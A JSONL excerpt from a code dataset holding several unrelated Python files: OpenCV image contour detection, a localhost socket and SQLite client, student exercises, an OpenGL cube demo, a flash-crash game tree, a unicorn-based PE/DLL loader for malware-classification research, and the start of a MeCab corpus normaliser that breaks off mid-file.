+{"seq_id":"366133998","text":"__author__ = 'KolesnikG'\n\nimport numpy as np\nimport cv2\n\nname=str(input('Enter the file name: '))\nimg = cv2.imread(name)\nindex=name.find('.jpg')\nname=name[:index]+'(binRes)'+'.jpg'\n\n\ngray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)\n\ngray_blur = cv2.GaussianBlur(gray, (15, 15), 0)\nret, thresh = cv2.threshold(gray_blur,0,255,cv2.THRESH_BINARY_INV+cv2.THRESH_OTSU)\nkernel = np.ones((3, 3), np.uint8)\nclosing = cv2.morphologyEx(thresh, cv2.MORPH_GRADIENT, kernel, iterations=1)\ncont_img=closing.copy()\nimage, contours, hierarchy = cv2.findContours(cont_img,cv2.RETR_EXTERNAL,cv2.CHAIN_APPROX_NONE)\nprint('All contours:',len(contours))\n\n\ndef getCount(cnt):\n count=[]\n for c in contours:\n area = cv2.contourArea(c)\n if area < 700 or area > 1000000:\n continue\n else:\n count+=[c]\n return count\nprint('After calibration:',len(getCount(contours)))\n\ndef getMask(cnt, i):\n mask = np.zeros_like(thresh)\n cv2.drawContours(mask, cnt,i, 255, -1)\n out = np.zeros_like(thresh)\n out[mask == 255] = thresh[mask == 255]\n return out\n\ndef getContourImage(cnt,i):\n box=np.int0(cv2.boxPoints(cv2.minAreaRect(cnt[i])))\n x=box[0][0];y=box[1][1]\n w=box[3][0];h=box[0][1]\n\n z=getMask(cnt,i)[y:h,x:w]\n\n if z.size==0:\n return False\n elif cv2.countNonZero(z)/z.size<0.2:\n return False\n else:\n print('Rectangle','x:',x,', y:',y,', w:',w,', h:',h)\n return True\n\nc=getCount(contours)\nfor i in range(0,len(c)):\n if getContourImage(c,i)==True:\n ell = cv2.fitEllipse(c[i])\n cv2.ellipse(img, ell, (0,255,0), 2)\n box=np.int0(cv2.boxPoints(cv2.minAreaRect(c[i])))\n cv2.drawContours(img,[box],0,(0,0,255),1)\n\ncv2.imwrite(name,img)\nprint('Image was saved in program folder(dest) with name:',name)","sub_path":"detection/dark_areas2.0.py","file_name":"dark_areas2.0.py","file_ext":"py","file_size_in_byte":1818,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"300457631","text":"import socket\nimport sqlite3\nimport time\nimport json\nimport sys\n\nHOST = '127.0.0.1'\nPORT = 5000\nBUFFER_SIZE = 8192\n\ndef get_data(s, BUFFER_SIZE):\n data = b''\n while True:\n part = s.recv(BUFFER_SIZE)\n data += part\n if len(part) < BUFFER_SIZE: # either 0 or end of data\n break\n\n return data\n\ndef format_data(data):\n if len(data) <= 99999 and len(data) > 9999:\n return str(len(data)+5) + \"HOLIS\" + data\n elif len(data) <= 9999 and len(data) > 999:\n return \"0\" + str(len(data)+5) + \"HOLIS\" + data\n elif len(data) <= 999 and len(data) > 99:\n return \"00\" + str(len(data)+5) + \"HOLIS\" + data\n elif len(data) <= 99 and len(data) > 9:\n return \"000\" + str(len(data)+5) + \"HOLIS\" + data\n elif len(data) <= 9 and len(data) > 0:\n return \"0000\" + str(len(data)+5) + \"HOLIS\" + data\n elif len(data) == 0:\n return \"00005HOLIS\"\n else:\n return \"00010HOLISERROR\"\n\n#def formatted_message(service: str, msg: str):\n# length = len(service + msg)\n# if len(service) != 5:\n# raise Exception('El largo del nombre del servicio debe ser igual a 5')\n# if len(msg) == 0:\n# raise Exception('Falta el mensaje')\n# if length > 99999:\n# raise Exception('Mensaje excede el largo de 99999 caracteres')\n# left_padding = '0'*(5 - len(f'{length}'))\n# return str.encode(left_padding + str(length) + service + msg)\n\ndef get_product_json(data):\n\tkeys = ['id', 'name', 'country', 'date']\n\tjson_object = []\n\n\tfor elem in data:\n\t\tdic = {}\n\t\tfor item in enumerate(keys):\n\t\t\tdic[item[1]] = elem[item[0]]\n\t\tjson_object.append(dic)\n\n\treturn json.dumps(json_object)\n\nwith socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:\n s.connect((HOST, PORT))\n s.sendall(b'00010sinitHOLIS')\n data = get_data(s, BUFFER_SIZE)\n print('Received1 ', data.decode('utf-8'))\n\n while True:\n data2 = get_data(s, BUFFER_SIZE)\n print('Received2 ', data2.decode('utf-8'))\n # time.sleep(5)\n\n conn = sqlite3.connect('Project.db')\n c = conn.cursor()\n\n if len(data2) == 10:\n c.execute(\"SELECT * FROM CLIENTS\")\n\n aux1 = get_product_json(c.fetchall())\n aux2 = format_data(aux1)\n conn.commit()\n conn.close()\n \n #aux2 = bytes(aux2, 'utf-8')\n #print(aux2, type(aux2)) \n #print(sys.getsizeof(bytes(aux2, 'utf-8')))\n \n \n if aux2:\n #s.sendall(b'00010HOLISTAMOS')\n s.sendall(bytes(aux2, 'utf-8'))\n \n \n s.close()\n\n\n\n#c.execute('''CREATE TABLE CLIENTS\n# ([generated_id] INTEGER PRIMARY KEY,[Client_Name] text, [Country_ID] integer, [Date] date)''')","sub_path":"services/db/Test_Select.py","file_name":"Test_Select.py","file_ext":"py","file_size_in_byte":2648,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"394238394","text":"from rest_framework import status\nfrom rest_framework.exceptions import APIException, _get_error_details\n\n\nclass GenericAPIException(APIException):\n status_code = status.HTTP_500_INTERNAL_SERVER_ERROR\n default_detail = 'A server error occurred.'\n default_code = 'error'\n\n def __init__(self, status_code=None, detail=None, code=None):\n if status_code is None:\n status_code = self.status_code\n if detail is None:\n detail = self.default_detail\n if code is None:\n code = self.default_code\n\n self.detail = _get_error_details(detail, code)\n self.status_code = status_code\n","sub_path":"api/exceptions.py","file_name":"exceptions.py","file_ext":"py","file_size_in_byte":646,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"633250484","text":"'''\nPython Programming hw7\n21500426\nSi Hyung You\n2018/04/25\n'''\nimport copy #for using deepcopy later, import copy function\nimport hw7module as m\ncheck=0\n#initialize 'sales' list with ten people, and their sales\nsales=[['김기수',79,34,45,50],['최영호',100,122,89,90],['김영후',34,45,23,67],\n ['홍미수',56,78,42,67],['박수민',118,135,90,99],['이성준',23,33,63,12],\n ['최미영',121,234,213,154],['김홍일',56,45,23,67],['박성민',67,77,45,89],['이수빈',56,50,65,23]]\n\n#first, add all salesman's sales for total sales and append it to each row\nfor i in range(len(sales)):\n totalsale = 0\n for j in range(4):\n totalsale += sales[i][j+1]\n sales[i].append(totalsale)\n print(sales[i])\n\n\nwhile True:\n print('*'*10, 'MENU', '*'*10) #repeat next menus unless user types F or f\n print(\"A. print salesman's sales\")\n print(\"B. specific person's sales\")\n print(\"C. sorting by sales\")\n print(\"D. add new salesman\")\n print(\"E. delete salesman\")\n print(\"F. terminate program\")\n print('*'*10, 'MENU', '*'*10)\n #store user's choice in variable so that program can determine which menu to execute\n choice = input(\"choose the menu: \")\n if choice == 'A' or choice == 'a':\n m.menu_A(sales)\n \n elif choice == 'B' or choice == 'b':\n m.menu_B(sales)\n\n elif choice == 'C' or choice == 'c':\n index = int(input(\"which index for sorting?: (0. name, 1. 1st quarter, 2. 2nd quarter, 3. 3rd quarter, 4. 4th quarter, 5. total sales) \"))\n m.menu_A(m.menu_C(sales, index)) #print sorted function(which differs from the original one) which being returned from menu_C \n\n elif choice == 'D' or choice == 'd':\n m.menu_D(sales)\n \n elif choice == 'E' or choice == 'e':\n index = int(input(\"which index for delete? \"))\n m.menu_E(sales, index)\n \n elif choice == 'F' or choice == 'f':\n break\n\n else:\n print(\"choose menu again..\") #if user types menu which is not suggested, tell them to choose again\n\nprint(\"Bye\")\n\n\n","sub_path":"hw7/21500426_hw7_SihyungYou.py","file_name":"21500426_hw7_SihyungYou.py","file_ext":"py","file_size_in_byte":2218,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"251057392","text":"#!/usr/bin/python\n# This file only is used to test code\n\n\nfrom capstone import *\n\n# using pefile module to handle PE file and dlls\nimport pefile\n\n# For handling arguments\nimport argparse\n\n# for interate a directory\nimport os\n\n# packing value\nimport struct\n\n# loading constants\nimport constants\n\n# For emulation, we use unicorn engine\nfrom unicorn import *\nfrom unicorn.x86_const import *\n\n\n# for PE class\nimport pe\n\n# Data structure\nimport datastructure\n\n# Now we can handle a dll. What we want to do here is to get dll's content\n# and also the dll's metadata \ndef dll_loader( dllPath, Dll, dllBase, dllNameBase, ldrBase):\n\n\t# Specify dll path\n\tdllName = dllPath.split('/')[1]\n\n\tDll.setName(dllName)\n\n\t# root dir of dlls\n\tDll.setDir(dllPath)\n\n\t# set dll name\n\tDll.setName(dllName)\n\n\t# parse dll\n\ttry:\n\t\tdll = pefile.PE(dllPath)\n\texcept pefile.PEFormatError:\n\t\tpass\n\n\t# Parse data directories\n\tdll.parse_data_directories()\n\n\t# Get dll's contents\n\tdata = str(bytearray(dll.get_memory_mapped_image()))\n\n\t# set content of dll\n\tDll.setData(data)\n\n\t# set DLL base\n\tDll.setDllBase(dllBase)\n\n\t# Set DLL name base\n\tDll.setDllNameBase(dllNameBase)\n\n\t# Set LDR base\t\n\tDll.setLdrBase(ldrBase)\n\n\t# Set dllBase for dll\n\tDll.setSizeOfImage(dll.OPTIONAL_HEADER.SizeOfImage)\n\n\t# Set entrypoint\n\tDll.setEntryPoint(dll.OPTIONAL_HEADER.AddressOfEntryPoint)\n\n\t# set import dll\n\tfor entry in dll.DIRECTORY_ENTRY_EXPORT.symbols:\n\t\tprint(\"entry address 0x%08x \" % (entry.address))\n\t\tprint(\"Dll Base 0x%08x \" % (Dll.getDllBase()))\n\t\tDll.setImpDll(entry.address, entry.name)\n\n\t# display import dll\n\tDll.getImpDll()\n\n\n\t# returns size of dll and base address\n\treturn Dll\n\n\t# Populate ldr instance\n\t#ldr.init_ldr()\n\n\n# Loading dlls into memory\ndef loadDlls(mu, dll):\n\n\t# Write dll content into memory at the address dllBase\n\t# We need the dll content and the address we are going to write\n\t# get DLL's content\n\tprint(\">>> Writing Dll data into memory\")\n\tdllData = dll.getData()\n\t# get DLL's base address\n\tdllBase = dll.getDllBase()\n\tmu.mem_write(dllBase, dllData)\n\n\t# Write dll name into memory ad the address dllNameBase\n\t# We need the dll name and the adress we are going to write\n\t# get DLL's name\n\tprint(\">>> Writing Dll name into memory\")\n\tdllName = dll.getName()\n\n\t# get name base address\n\tdllNameBase = dll.getDllNameBase()\n\tmu.mem_write(dllNameBase, dllName)\n\n\t# Write LDR module to memory\n\t#mu.mem_write(ldrBase, )\n\n\n# Parse input pe\ndef parse_pe(newFile, peobj):\n\n\t# Open PE file\n\tpef = pefile.PE(newFile, fast_load = True)\n\n\t# If the PE file was loaded usign the fast_load=True argument, \n\t# we will need to parse the data directories\n\tpef.parse_data_directories()\n\n\t# Finding entrypoint\n\tpeobj.setEntryPoint(pef.OPTIONAL_HEADER.AddressOfEntryPoint)\n\tprint(\"Entry point: 0x%08x \" % (peobj.getEntryPoint()))\n\n\t# Iterate imports and popluate pe\n\tfor entry in pef.DIRECTORY_ENTRY_IMPORT:\n\n\t\tfor imp in entry.imports:\n\n\t\t\t# import name\n\t\t\tpeobj.setImportName(imp.name)\n\n\t\t\t# import address\n\t\t\tpeobj.setImportAddr(imp.address)\n\n\t\t\t# import's library\n\t\t\tpeobj.setImportLib(entry.dll)\n\t\t\t#print(\"%s : 0x%08x: %s\" % (peobj.getImportName(), peobj.getImportAddr(), peobj.getImportLib()))\t\n\n\t# Iterate sections\n\tfor section in pef.sections:\n\n\t\t# section name\n\t\tpeobj.setSectionName(section.Name)\n\n\t\t# virtual address\n\t\tpeobj.setSectionVirAddr(section.VirtualAddress)\n\n\t\t# virtual size\n\t\tpeobj.setSectionVirSize(section.Misc_VirtualSize)\n\n\t\t# raw size\n\t\tpeobj.setSectionSizeOfRawData(section.SizeOfRawData)\n\n\t\t# Test\n\t\tprint(\"%s : 0x%08x: 0x%08x: 0x%08x\" %(peobj.getSectionName(), peobj.getSectionVirAddr(),\n\t\t\tpeobj.getSectionVirSize(), peobj.getSectionSizeOfRawData()))\n\n\t\t# Look for an entry point in a section\n\t\tif section.contains_rva(peobj.getEntryPoint()):\n\t\t\tprint(\"Section %s contains an entry point\" % (peobj.getSectionName()))\n\n\t\t\t# populate a text section with match section\n\t\t\tpeobj.setCodeSection(section)\n\n\t\t\t# set size of text section\n\t\t\tpeobj.setCodeSectionSize(peobj.getSectionSizeOfRawData())\n\n\t\t\tprint(\"Code section size : 0x%08x\" % (peobj.getCodeSectionSize()))\n\n\n\t# Rewrite Import Address Table\n\tpeobj.setData(bytearray(pef.get_memory_mapped_image()))\n\n\n\n\n\n\n# main function\ndef main():\n\n\t# parse arguments\n\t# Create an ArgumentParser object\n\tparser = argparse.ArgumentParser(prog = \"Malware Classification\", description = 'Searching an export in a DLL')\n\n\t# Add the first argument: a path to the dll\n\tparser.add_argument('-d', dest='dll_path', help='Specify a dll path')\n\n\t# Add the second argument: an disired export\n\tparser.add_argument('-e', dest='export', help='Specify a disired export')\n\n\t\t# Add the second argument: an disired export\n\tparser.add_argument('-f', dest='file', help='Specify a disired pe file')\n\n\t# Let's parse arguments, the arguments are accessed through args variable\n\targs = parser.parse_args()\n\n\t# Test\n\tpeobj = pe.PE()\n\n\tparse_pe(args.file, peobj)\n\n\t# Create a LDR instance\n\tx86os = datastructure.X86_OS()\n\n\tDlls = []\n\t# Time for unicorn\n\ttry:\n\n\t\t# Initialize an emulator in X86-32bit mode\n\t\tmu = Uc(UC_ARCH_X86, UC_MODE_32)\n\n\t\t# Map 10MB memory for the emulation\n\t\tmu.mem_map(constants.FS_0, 100 * 1024 * 1024)\n\n\t\t# Initializing Stack frame\n\t\tfss = x86os.init_FS()\n\t\tmu.mem_write(constants.FS_0, fss)\n\t\t\n\t\t# FS register\n\t\tmu.reg_write(UC_X86_REG_FS, constants.FS_0)\t\n\t\t\t\n\t\t# initializing PEB\n\t\tprint(\"Initializing PEB\")\n\t\tmu.mem_write(constants.PEB_ADD, x86os.init_peb())\n\n\t\t# initializing TEB\n\t\tprint(\"Initializing TEB\")\n\t\tmu.mem_write(constants.TEB_ADD, x86os.init_teb())\n\n\t\t# initializing stack of emulator\n\t\tmu.reg_write(UC_X86_REG_EBP, constants.STACK_BASE)\n\t\tmu.reg_write(UC_X86_REG_ESP, constants.STACK_BASE)\n\n\t\t# Testing\n\t\tprint(\"PEB\", mu.mem_read(constants.PEB_ADD , len(x86os.init_peb())))\n\t\tprint(\"TEB\", mu.mem_read(constants.TEB_ADD , len(x86os.init_teb())))\n\t\tprint(\"FS\", mu.mem_read(constants.FS_0 , len(x86os.init_FS())))\n\t\tprint(\"FS register: 0x%08x \" % (mu.reg_read(UC_X86_REG_FS)))\n\t\tprint(\"ESP register: 0x%08x \" % (mu.reg_read(UC_X86_REG_ESP)))\n\t\tprint(\"EBP register: 0x%08x \" % (mu.reg_read(UC_X86_REG_EBP)))\n\t\t# Loading dlls\n\t\tprint(\"\\n>>> Loading DLLs...\")\n\n\t\t# Iterate DLL directory\n\t\tfor subdir, dirs, files in os.walk(args.dll_path):\n\n\t\t\t# We need a based address for dlls\n\t\t\tdllBase = 0x550000\n\n\t\t\t# Base address of DLL name\n\t\t\tdllNameBase = 0x2500\n\n\t\t\t# Base address of LDR module\n\t\t\tldrBase = 0x9000\n\n\t\t\t# Number of Dlls in a directory\n\t\t\tNoOfDlls = 0\n\n\t\t\t# List of ldr address, to keep track order of the list\n\t\t\tldrList = []\n\n\t\t\t# List of in memory Dlls\n\t\t\t#dllList = DllList()\n\n\t\t\tdllList = datastructure.DoubleList()\n\n\t\t\t# Iterate dlls in the directory\n\t\t\tfor file in files:\n\n\t\t\t\t# Increase number of Dlls by 1\n\t\t\t\tNoOfDlls = NoOfDlls + 1\n\n\t\t\t\t# get fullpath of dll\n\t\t\t\tfullpath = os.path.join(subdir, file)\n\n\t\t\t\t# Create an instance of DLL\n\t\t\t\tdllobj = pe.Dll()\n\n\t\t\t\t# size of the current dll\n\t\t\t\tdllobj = dll_loader(fullpath, dllobj, dllBase, dllNameBase, ldrBase)\n\n\t\t\t\t# Writing dll components into memory\n\t\t\t\t# Loading the dll into memory\n\t\t\t\tloadDlls(mu, dllobj)\n\n\t\t\t\tprint(\"Reading %d bytes from [0x%08x]: %s\" % (dllobj.sizeOfDllName(),\n\t\t\t dllobj.getDllNameBase(), mu.mem_read(dllobj.getDllNameBase(),dllobj.sizeOfDllName())))\n\t\t\t\tprint(\"\\n\")\n\n\t\t\t\t# size of Dll\n\t\t\t\tdllSize = dllobj.sizeOfData()\n\n\t\t\t\t# Store Dll instances into the list\n\t\t\t\tDlls.append(dllobj)\n\n\t\t\t\t# inmemory lsit\n\t\t\t\t#dllList.add(dll)\n\n\t\t\t\tdllList.append(dllobj)\n\n\t\t\t\t# Update ldrList\n\t\t\t\tldrList.append(ldrBase)\n\n\t\t\t\t# Align memory to load the next dlls\n\t\t\t\tdllBase = dllBase + dllSize\n\n\t\t\t\t# Adjust base address of DLL\n\t\t\t\tdllNameBase = dllNameBase + 200\n\t\t\t\t\n\t\t\t\t# Each LDR module takes a memory of 8192 Byte\n\t\t\t\t# This means we increase the base 0x2000 for each interation\n\t\t\t\tldrBase = ldrBase + 8192 # 0x2000\n\n\t\t# Print in-memory list\n\t\tdllList.show()\n\n\n\texcept UcError as e:\n\t\tprint(\"ERROR: %s\" % e)\n\t\tmu.emu_stop()\n\nif __name__ == \"__main__\":\n\tmain()\n\n","sub_path":"test.py","file_name":"test.py","file_ext":"py","file_size_in_byte":7889,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"83275022","text":"import pygame\nfrom pygame.locals import *\nfrom random import *\nfrom OpenGL.GL import *\nfrom OpenGL.GLU import *\n\nANGLE_ROT = 20\nNB_CUBES = 2\nNUM_GENERE = 0\nNO_CUBE = 0\nALEAT = [[(random(),random(),random()) for _ in range(NB_CUBES*3*4*6)] for _ in range(NB_CUBES)]\n\nverticies = (\n (1, -1, -1),\n (1, 1, -1),\n (-1, 1, -1),\n (-1, -1, -1),\n (1, -1, 1),\n (1, 1, 1),\n (-1, -1, 1),\n (-1, 1, 1)\n )\n\nedges = ((0,1),(0,3),(0,4),(2,1),(2,3),(2,7),(6,3),(6,4),(6,7),(5,1),(5,4),(5,7))\nsurfaces = ((0,1,2,3),(3,2,7,6),(6,7,5,4),(4,5,1,0),(1,5,7,2),(4,0,3,6))\n\ndef Cube(verticies=verticies):\n global NO_CUBE\n glBegin(GL_QUADS)\n for surface in surfaces:\n #x = 0\n NUM_GENERE = 0\n for vertex in surface:\n #x+=1\n #glColor3fv(colors[randint(0,len(colors)-1)]) # Cube épileptique !\n #glColor3fv((random(),random(),random()))\n #print(ALEAT)\n print(NO_CUBE,NUM_GENERE)\n glColor3fv(ALEAT[NO_CUBE][NUM_GENERE])\n NUM_GENERE+=1\n glVertex3fv(verticies[vertex])\n glEnd()\n NO_CUBE+=1\n print(NO_CUBE,\"END FUNCTION CUBE\")\n\n glBegin(GL_LINES)\n for edge in edges:\n for vertex in edge:\n glVertex3fv(verticies[vertex])\n glEnd()\n\ndef main():\n pygame.init()\n display = (800,600)\n pygame.display.set_mode(display, DOUBLEBUF|OPENGL)\n\n gluPerspective(45, (display[0]/display[1]), 0.1, 50.0)\n\n glTranslatef(0,0, -10)\n\n glRotatef(25, 2, 1, 0)\n\n while True:\n \n for event in pygame.event.get():\n if event.type == pygame.QUIT:\n pygame.quit()\n quit()\n\n if event.type == pygame.KEYDOWN:\n if event.key == pygame.K_KP4:\n glTranslatef(-0.5,0,0)\n if event.key == pygame.K_KP6:\n glTranslatef(0.5,0,0)\n if event.key == pygame.K_KP8:\n glTranslatef(0,1,0)\n if event.key == pygame.K_KP2:\n glTranslatef(0,-1,0)\n \n if event.key == pygame.K_PAGEDOWN:\n glRotatef(ANGLE_ROT, 1, 0, 0)\n if event.key == pygame.K_PAGEUP:\n glRotatef(ANGLE_ROT, -1, 0, 0)\n if event.key == pygame.K_UP:\n glRotatef(ANGLE_ROT, 0, 1, 0)\n if event.key == pygame.K_DOWN:\n glRotatef(ANGLE_ROT, 0, -1, 0)\n \n if event.key == pygame.K_RIGHT:\n glRotatef(ANGLE_ROT, 0, 0, 1)\n if event.key == pygame.K_LEFT:\n glRotatef(ANGLE_ROT, 0, 0, -1)\n\n #glRotatef(1, 3, 1, 1)\n glClear(GL_COLOR_BUFFER_BIT|GL_DEPTH_BUFFER_BIT)\n Cube()\n #Cube([list(map(lambda x:x/2,e)) for e in verticies])\n pygame.display.flip()\n #pygame.time.wait(0)\n\nmain()\n","sub_path":"test pls cubes.py","file_name":"test pls cubes.py","file_ext":"py","file_size_in_byte":2924,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"279140620","text":"import copy\n\nfrom AssetFundNetwork import AssetFundsNetwork\nimport random\n\nfrom common import copy_network\nfrom constants import ATTACKER, CHANCE, DEFENDER, MARKET, BUY, SELL, SIM_TRADE\nfrom games.bases import GameStateBase\n\n\nclass PlayersHiddenInfo:\n def __init__(self,attacker_attack, attacker_pid, defender_budget):\n self.attacker_attack = attacker_attack\n self.attacker_pid = attacker_pid\n self.defender = defender_budget\n\n def __eq__(self, other):\n return isinstance(other, PlayersHiddenInfo) and self.defender == other.defender and\\\n self.attacker_attack == other.attacker_attack and self.attacker_pid == other.attacker_pid\n\n\nclass PortfolioFlashCrashGameStateBase(GameStateBase):\n\n def __init__(self, parent, to_move, actions, af_network, players_info, actions_history):\n super().__init__(parent=parent, to_move = to_move,actions=actions)\n self.actions_history=actions_history\n self.af_network = af_network\n self.players_info = players_info\n self.children = {}\n\n def inf_set(self):\n return self._information_set\n\n def evaluation(self):\n if not self.is_terminal():\n raise RuntimeError(\"trying to evaluate non-terminal node\")\n\n return -1*self.af_network.count_margin_calls()\n\n\nclass PortfolioFlashCrashRootChanceGameState(GameStateBase):\n def __init__(self, action_mgr, af_network:AssetFundsNetwork, defender_budget):\n self._chance_prob = action_mgr.get_portfolios_prob()\n portfolios = {x: y.order_set for x, y in action_mgr.get_portfolios().items() if x in self._chance_prob}\n super().__init__(parent=None, to_move=CHANCE, actions = portfolios.keys())\n self.af_network = af_network\n self.children = {\n str(p_id): PortfolioAttackerMoveGameState(\n parent=self, actions_manager=action_mgr, to_move=ATTACKER,\n players_info=PlayersHiddenInfo(p, p_id, defender_budget),\n af_network=af_network,\n actions_history={BUY:[],SELL:[],SIM_TRADE:[]}\n ) for p_id, p in portfolios.items()\n }\n\n self.tree_size = 1 + sum([x.tree_size for x in self.children.values()])\n\n def is_terminal(self):\n return False\n\n def inf_set(self):\n return \".\"\n\n def chance_prob(self):\n return self._chance_prob\n\n def sample_one(self):\n return random.choice(list(self.children.values()))\n\n\nclass PortfolioMarketMoveGameState(PortfolioFlashCrashGameStateBase):\n\n def __init__(self, parent, actions_manager, to_move, players_info, af_network, actions_history):\n self.terminal = af_network.no_more_sell_orders()\n if self.terminal:\n actions = []\n else:\n net2 = copy_network(af_network)\n actions = [str(net2.simulate_trade())]\n\n super().__init__(parent = parent, to_move = to_move, actions=actions,\n af_network = af_network, players_info=players_info, actions_history=actions_history)\n\n self._information_set = \".{0}.{1}.{2}\".format('MARKET_HISTORY:' + str(actions_history[SIM_TRADE])\n ,'BUY:'+str(af_network.buy_orders), 'SELL:'+str(af_network.sell_orders))\n\n if actions:\n action = actions[0]\n actions_history2 = copy.deepcopy(actions_history)\n actions_history2[SELL].append(action)\n actions_history2[BUY].append(action)\n actions_history2[SIM_TRADE].append(action)\n self.children[action] = PortfolioAttackerMoveGameState(\n self,\n actions_manager,\n ATTACKER,\n players_info,\n net2,\n actions_history2\n )\n self.tree_size = 1 + sum([x.tree_size for x in self.children.values()])\n\n def chance_prob(self):\n return 1\n\n def is_terminal(self):\n return self.terminal\n\n\nclass PortfolioAttackerMoveGameState(PortfolioFlashCrashGameStateBase):\n def __init__(self, parent, actions_manager, to_move, players_info, af_network, actions_history):\n actions = actions_manager.get_possible_attacks_from_portfolio(players_info.attacker_attack, af_network.no_more_sell_orders())\n self.terminal = not actions\n\n super().__init__(parent=parent, to_move=to_move, actions = [str(x['action_subset']) for x in actions ],\n af_network=af_network, players_info=players_info, actions_history=actions_history)\n\n for action in actions:\n order_set = action['action_subset']\n net2 = copy_network(af_network)\n net2.submit_sell_orders(order_set)\n actions_history2 = copy.deepcopy(actions_history)\n actions_history2[SELL].append(str(order_set))\n self.children[str(order_set)] = PortfolioDefenderMoveGameState(\n self,\n actions_manager,\n DEFENDER,\n PlayersHiddenInfo(action['remaining_orders'], players_info.attacker_pid, players_info.defender),\n net2,\n actions_history2,\n )\n\n self.tree_size = 1 + sum([x.tree_size for x in self.children.values()])\n self._information_set = \".{0}.{1}\".format(players_info.attacker_pid, 'A_HISTORY:' + str(actions_history[SELL]))\n\n def is_terminal(self):\n return self.terminal\n\n\nclass PortfolioDefenderMoveGameState(PortfolioFlashCrashGameStateBase):\n\n def __init__(self, parent, actions_manager, to_move, players_info, af_network, actions_history):\n defenses = actions_manager.get_possible_defenses(af_network, players_info.defender)\n str_order_sets = [str(x[0]) for x in defenses]\n super().__init__(parent=parent, to_move=to_move, actions=str_order_sets,\n af_network=af_network, players_info=players_info, actions_history=actions_history)\n\n# if not defenses:\n# self.budget.defender = 0 #in case there is only a small amount of money\n # else:\n for order_set, cost in defenses:\n net2 = copy_network(af_network)\n net2.submit_buy_orders(order_set)\n actions_history2 = copy.deepcopy(actions_history)\n actions_history2[BUY].append(str(order_set))\n self.children[str(order_set)] = PortfolioMarketMoveGameState(\n self,\n actions_manager,\n MARKET,\n PlayersHiddenInfo(players_info.attacker_attack, players_info.attacker_pid, players_info.defender - cost),\n net2,\n actions_history2\n )\n self._information_set = \".{0}.{1}\".format(players_info.defender, 'D_HISTORY:' + str(actions_history[BUY]))\n self.tree_size = 1 + sum([x.tree_size for x in self.children.values()])\n\n def is_terminal(self):\n return False\n\n\n\n\n","sub_path":"games/flash_crash/flash_crash_players_portfolio_cfr.py","file_name":"flash_crash_players_portfolio_cfr.py","file_ext":"py","file_size_in_byte":6932,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"474586079","text":"\r\ndef a_sum():\r\n N = 5 #antall ledd\r\n summen = 0 #summen av 0 ledd\r\n for i in range(1,N):\r\n x_i = 1/i**2 #i-ende leddet\r\n summen = summen + x_i #summen med det i-ende leddet\r\n print(summen)\r\n\r\ndef b_sum():\r\n tol = 0.00000000000000001 #feiltoleranse\r\n x_i = 1 #nullte leddet\r\n i = 1 #ledd-teller\r\n summen = 1 #summen av 1 ledd \r\n while x_i - 1/(i+1)**2 > tol:\r\n x_i = 1/(i+1)**2\r\n summen = summen + x_i\r\n i += 1\r\n print(\"Summen er \",summen,\" og antall ledd er \", i)\r\n\r\na_sum()\r\n\r\nb_sum()\r\n","sub_path":"tdt4110/Øving 3/sum.py","file_name":"sum.py","file_ext":"py","file_size_in_byte":603,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"87"}
+{"seq_id":"541878902","text":"import os,sys,imp,time,romkan,copy,re,functools,itertools\nfrom collections import OrderedDict\nfrom collections import defaultdict\n#from mecabtools import mecabtools\n#imp.reload(mecabtools)\nfrom pythonlib_ys import main as myModule\nfrom pythonlib_ys import jp_morph\nimp.reload(myModule)\nHomeDir=os.getenv('HOME')\nmecabtools=imp.load_source('mecabtools',os.path.join(HomeDir,'myProjects/myPythonLibs/mecabtools/mecabtools.py'))\nimport mecabtools\nimp.reload(mecabtools)\nfrom probability import probability\nimp.reload(probability)\n\nDebug=1\n\ndef main0(LexFPs,MecabCorpusFPs,CorpusOnly=False,FreqWdFP=None,UnnormalisableMarkP=True,ProbExemplarFP=None,OutFP=None):\n LexDir=os.path.dirname(LexFPs[0])\n RelvFts=('cat','subcat','subcat2','sem','infform','infpat','pronunciation')\n ProbExemplars=get_exemplars(ProbExemplarFP) if ProbExemplarFP else None\n Frequents=collect_freq_wds(FreqWdFP,1000) if FreqWdFP else set()\n OutFPStem='--'.join([os.path.basename(LexFP) for LexFP in LexFPs])\n HClusters,_=myModule.ask_filenoexist_execute_pickle(OutFPStem+'.pickle',get_clustered_homs,([LexFPs,RelvFts],{'Frequents':Frequents,'ProbExemplars':ProbExemplars,'OutFP':OutFPStem+'.out'}))\n if Debug:\n print_clustered_homs(HClusters,OutFP=os.path.join(LexDir,'exemplarless_clusters.txt'))\n LexFPs=[] if CorpusOnly else LexFPs\n for MecabFile,CorpusOrDic in [(LexFP,'dic') for LexFP in LexFPs]+[(MecabCorpusFP,'corpus') for MecabCorpusFP in MecabCorpusFPs]:\n sys.stderr.write('\\n\\nNormalising a '+CorpusOrDic+' '+MecabFile+'\\n')\n time.sleep(2)\n FN=os.path.basename(MecabFile)\n NewFN=myModule.change_stem(FN,'.normed')\n NewDir=os.path.join(os.path.dirname(MecabFile),'normed')\n if not os.path.isdir(NewDir):\n os.makedirs(NewDir)\n if OutFP:\n OutFP=OutFP\n else:\n OutFP=os.path.join(NewDir,NewFN)\n normalise_mecabfile(MecabFile,RelvFts,HClusters,OutFP=OutFP,CorpusOrDic=CorpusOrDic,UnnormalisableMarkP=UnnormalisableMarkP)\n\n\ndef print_clustered_homs(ClusteredHs,OutFP=None):\n Out=open(OutFP,'wt') if OutFP else sys.stdout\n for ClusteredH in ClusteredHs:\n if Debug<2 and ClusteredH.exemplar is None:\n Out.write(ClusteredH.show_summary()+'\\n')\n if OutFP:\n Out.close()\n\ndef get_exemplars(ExemplarFP):\n WdsReprs={}\n with open(ExemplarFP) as FSr:\n for LiNe in FSr:\n if LiNe:\n 